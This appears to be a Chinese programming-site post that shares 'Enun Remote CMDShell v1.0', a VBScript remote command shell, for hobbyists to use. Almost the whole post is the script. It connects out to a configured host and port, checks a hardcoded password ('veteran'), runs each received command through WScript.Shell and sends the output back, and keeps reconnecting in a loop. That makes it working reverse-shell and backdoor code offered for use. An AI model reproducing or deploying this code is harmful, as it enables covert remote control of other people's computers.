Enun Remote CMDShell,喜欢玩cmdshell的朋友可以参考下
效果如图:
复制代码 代码如下:
'============================
' Enun Remote CMDShell v 1.0
'============================
Option Explicit
CONST ACCOUNT_LOCK_TIME = 600000'账户锁定时间,10分钟
CONST LOCKOUT_BAD_COUNT = 3'密码失败次数
CONST DEFAULT_WAIT_TIME = 1000'默认延时,1秒
CONST DEFAULT_TIME_OUT= 60000'默认超时,60秒
Public WinSocket, sRevData, Count
Do
On Error Resume Next
Do While (WinSocket.State <> 7)
Dim ObjectFSO, GetConfig, Line, Host, Port, i
Set WinSocket = WScript.CreateObject("MSWinsock.Winsock")
Set ObjectFSO = CreateObject("Scripting.FileSystemObject")
Set GetConfig = ObjectFSO.OpenTextFile(".enunrc.ini", 1)
For i = 1 To 3
Line = GetConfig.ReadLine
If InStr(Line,"Host") > 0 Then Host = Split(Line, "=", -1, 1)(1)
If InStr(Line,"Port") > 0 Then Port = Split(Line, "=", -1, 1)(1)
Next
If (Len(Host) = 0) Then Host = "127.0.0.1"
If (Len(Port) = 0) Then Port = "8090"
WinSocket.Protocol = 0
WinSocket.RemoteHost = Host
WinSocket.RemotePort = Port
WinSocket.Connect
WScript.Sleep DEFAULT_WAIT_TIME * 5
Call TrackScript(2, WinSocket.State, WinSocket.BytesReceived)
'Setp: 2
Loop
Do While (WinSocket.State <> 9 and WinSocket.State <> 0)
Dim AuthKey, LockoutBadCount, TIMEOUT_M, TIMEOUT_N
TIMEOUT_N = 0
WinSocket.SendData WinSocket.LocalHostName & " is Connected, Enter Password: "
Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
TIMEOUT_N = TIMEOUT_N + 1000
Call ControlTimeout(TIMEOUT_N)
Loop
WinSocket.GetData Authkey, vbString
If Split(Authkey, chr(10), -1, 1)(0) = "veteran" Then
WinSocket.SendData "Logon Success, Welcome!" & vbcrlf
sRevData = "veteran"
Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
Dim ShellObj, Executes
Set ShellObj = CreateObject("WScript.Shell")
Set Executes = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))
WinSocket.SendData Executes.StdOut.ReadAll
WinSocket.SendData Executes.StdErr.ReadAll
If (Len(sRevData) > 0) Then
TIMEOUT_M = 0
WinSocket.SendData vbcrlf & "[" & WinSocket.LocalHostName & "@enun]#: "
Else
Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
TIMEOUT_M = TIMEOUT_M + 1000
Call ControlTimeout(TIMEOUT_M)
Loop
End If
If (LCase(Left(sRevData, 4)) = "exit") Then WinSocket.Close
WinSocket.GetData sRevData, vbString
WScript.Sleep DEFAULT_WAIT_TIME
Call TrackScript(5, WinSocket.State, WinSocket.BytesReceived)
'Setp: 5
Loop
Else
LockoutBadCount = LockoutBadCount + 1
WinSocket.SendData "Logon fail: Unknown user name or bad password." & vbcrlf
WScript.Sleep DEFAULT_WAIT_TIME
End If
If (LockoutBadCount = LOCKOUT_BAD_COUNT) Then
WinSocket.SendData "Failed too many times, the account has been locked!" & vbcrlf
WScript.Sleep DEFAULT_WAIT_TIME
WinSocket.Close
LockoutBadCount = 0
WScript.Sleep ACCOUNT_LOCK_TIME
'锁定账户
End If
Call TrackScript(3, WinSocket.State, WinSocket.BytesReceived)
'Setp: 3
Loop
Call TrackScript(1, WinSocket.State, WinSocket.BytesReceived)
'Setp: 1
Loop
'=======================
'Control Timeout.
'=======================
Public Sub ControlTimeout(Count)
If Count = DEFAULT_TIME_OUT Then
WinSocket.SendData vbcrlf & "Local server response timeout, Please reconnect ..." & vbcrlf
WScript.Sleep DEFAULT_WAIT_TIME
WinSocket.Close
'控制端60秒内无输入的话,连接自动断开,可即时连接。
Else
WScript.Sleep DEFAULT_WAIT_TIME
End If
Call TrackScript(4, WinSocket.State, WinSocket.BytesReceived)
'Setp: 4
End Sub
'=======================
'Track Script.
'=======================
Public Sub TrackScript(MyStep, StateCode, BytesReceived)
WScript.echo "MyStep: " & MyStep & ", StateCode: " & StateCode & ", Received: " & BytesReceived & " Bytes"
End Sub
